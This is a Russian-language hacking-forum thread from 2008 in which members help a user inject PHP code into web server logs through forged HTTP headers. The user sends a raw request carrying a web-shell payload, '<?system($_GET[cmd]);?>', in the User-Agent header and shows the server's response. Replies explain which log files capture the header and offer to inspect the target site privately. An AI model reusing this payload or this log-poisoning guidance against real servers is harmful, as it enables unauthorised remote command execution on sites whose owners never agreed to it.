ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Телнет и заголовки
  #1  
Старый 05.08.2008, 13:28
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию Телнет и заголовки

Как можно через телнет посылать заголовки ? например чтонить такое - UserAgent:<?system('ls -a');?>;
Referrer:noob.html.На ачате не нашёл)
 
Ответить с цитированием

  #2  
Старый 05.08.2008, 13:53
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

telnet www.site.com 80

GET /paga.php HTTP/1.1
Host: www.site.com
User-Agent: ie 7.0
Referer: http://www.site.com/index.html

как то так...
 
Ответить с цитированием

  #3  
Старый 05.08.2008, 13:57
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Хм....попробую.Просто если открывать соединение на 80-ый порт, то он просто виснет =_=.А когда начинаешь после этого писать какуюнить фигню, то выдаёт исходник страницы,хотя не посылаешь ничего.Это в один запрос надо чель?)
 
Ответить с цитированием

  #4  
Старый 05.08.2008, 14:04
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Ладно.Решил сделать по-другому - отправить запрос на серв через хттр:

GET / HTTP/1.1
Accept: */*
Accept-Language: uk
User-Agent: <?system($_GET[cmd]);?>
Host: www.site.com
Connection: Close

Ответ:

HTTP/1.1 200 OK

Connection: close

Date: Tue, 05 Aug 2008 10:10:47 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Set-Cookie: COASTATS=4898272623692111972422731601; domain=.site.com; expires=Tue 30-Dec-2031 23:59:59 GMT; path=/

X-AspNet-Version: 2.0.50727

Set-Cookie: ASP.NET_SessionId=np2ywp550545fyz4yzo0hpmy; path=/; HttpOnly


Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 56557


В еррор лог не записалось ничего.Может с ошибкой послать надо?).Странно,но почему-то в еррор.лог нет ни одной моей ошибки)))).Последние записи идут за декабрь прошлого года)).Есть ещё access_log,но на него почему-то нет прав,хотя под рутом.

Последний раз редактировалось Велемир; 05.08.2008 в 14:34..
 
Ответить с цитированием

  #5  
Старый 05.08.2008, 14:31
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

хз, проверил у себя, запрос работает

Цитата:
http://psih.name/access.txt

GET http://www.psih.name/test.php HTTP/1.1
Host: www.psih.name
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Referer: http://www.site.com/index.html
 
Ответить с цитированием

  #6  
Старый 05.08.2008, 14:40
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Запрос то работает, но почему-то не логгируется нихрена.Ведь независимо от того,к какой странице или папке совершается запрос,действия должны логгироваться.Может,таких файлов два ? Дело в том,что если ошибки в запросах к бд присутствует,типа *фаил не существует* или * к папке нет доступа*, действия не логгируются в еррор_лог
 
Ответить с цитированием

  #7  
Старый 05.08.2008, 14:41
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

все эти действия пишутся в access_log...
 
Ответить с цитированием

  #8  
Старый 05.08.2008, 14:58
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

И что ж делать тогда ?
 
Ответить с цитированием

  #9  
Старый 05.08.2008, 15:02
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Цитата:
Сообщение от Велемир  
И что ж делать тогда ?
ищи httpd.conf, там смотри нужный ServerName, и смотри где находится access_log ....

скинь линк в пм, я посматрю... (если хочешь )

Последний раз редактировалось aka PSIH; 05.08.2008 в 15:19..
 
Ответить с цитированием

  #10  
Старый 05.08.2008, 15:04
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

Откуда знаешь шо логируется иль нет? И есть ли у тебя путь к лог-файлам и доступ к ним ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Почтовые заголовки SSB1981 PHP, PERL, MySQL, JavaScript 2 28.04.2008 17:02
заголовки писем sweeta E-Mail 1 01.04.2008 01:27
Как приконнектиться через ТЕЛНЕТ max_rebel Безопасность 22 25.03.2008 16:31
Заголовки Curl Isis PHP, PERL, MySQL, JavaScript 7 24.03.2008 16:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ